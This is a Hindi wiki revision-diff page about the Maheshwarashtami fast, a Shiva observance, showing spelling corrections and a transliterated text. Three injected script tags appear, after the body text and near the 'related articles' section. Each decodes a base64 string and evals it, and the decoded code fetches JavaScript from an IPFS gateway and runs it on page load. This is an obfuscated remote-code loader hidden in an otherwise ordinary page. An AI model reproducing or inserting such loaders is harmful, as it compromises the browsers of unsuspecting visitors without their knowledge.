Difference between revisions of "महेश्वराष्टामी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==")
 
(4 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*[[मार्गशीर्ष]] [[शुक्ल पक्ष|शुक्ल]] की [[नवमी]] से प्रारम्भ होता है।  
 
*[[मार्गशीर्ष]] [[शुक्ल पक्ष|शुक्ल]] की [[नवमी]] से प्रारम्भ होता है।  
*इस व्रत में [[शिव]] की पूजा; लिंग या प्रतिमा के रूप में या [[कमल]] पर; घी एवं दूध से स्नान कराना; अन्त में गौदान करना चाहिए।  
+
*इस व्रत में [[शिव]] की पूजा; लिंग या प्रतिमा के रूप में या [[कमल]] पर; घी एवं दूध से स्नान कराना।
*यह व्रत यदि यदि वर्ष भर किया जाए तो [[अश्वमेघ यज्ञ]] का लाभ एवं शिवलोक की प्राप्ति होती है। <ref>हेमाद्रि (व्रत0 1, 747-748, विष्णुधर्मोत्तरपुराण से उद्धरण) ।</ref>
+
*अन्त में गौदान करना चाहिए।  
 +
*यह व्रत यदि यदि वर्ष भर किया जाए तो [[अश्वमेध यज्ञ]] का लाभ एवं शिवलोक की प्राप्ति होती है।<ref>हेमाद्रि (व्रत0 1, 747-748, विष्णुधर्मोत्तरपुराण से उद्धरण) ।</ref>
  
  
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 14:31, 23 July 2014

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • margashirsh shukl ki navami se prarambh hota hai.
  • is vrat mean shiv ki pooja; liang ya pratima ke roop mean ya kamal par; ghi evan doodh se snan karana.
  • ant mean gaudan karana chahie.
  • yah vrat yadi yadi varsh bhar kiya jae to ashvamedh yajn ka labh evan shivalok ki prapti hoti hai.[1]


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. hemadri (vrat0 1, 747-748, vishnudharmottarapuran se uddharan) .

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>